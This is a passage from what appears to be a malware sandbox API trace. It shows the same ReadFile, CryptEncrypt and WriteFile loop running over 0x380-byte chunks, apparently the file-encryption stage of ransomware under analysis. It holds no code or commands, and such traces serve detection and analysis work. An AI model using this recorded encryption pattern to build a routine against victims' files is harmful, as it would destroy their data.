lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.295] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.295] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.295] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.295] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.295] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.295] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.296] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.296] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.296] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.296] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.296] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.296] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.296] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.296] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.296] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.296] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.296] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.296] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.296] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.297] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.297] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.297] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.297] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.297] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.297] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.297] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.297] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.297] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.297] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.297] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.297] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.297] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.298] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.298] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.298] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.298] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.298] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.298] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.298] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.298] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.298] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.298] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.298] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.298] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.298] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.298] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.298] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.299] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.299] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.299] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.299] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.299] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.299] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.299] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.300] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.300] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.300] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.300] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.300] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.300] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.300] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.300] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.300] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.300] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.300] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.300] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.300] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.300] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.301] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.301] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.301] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.301] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.301] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.301] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.301] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.301] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.301] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.301] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.301] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.301] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.301] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.301] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.301] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.301] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.301] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.301] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.302] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.302] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.302] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.302] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.302] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.302] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.302] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.302] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.302] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.302] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.302] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.302] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.302] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.302] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.302] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.302] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.303] CryptEncrypt 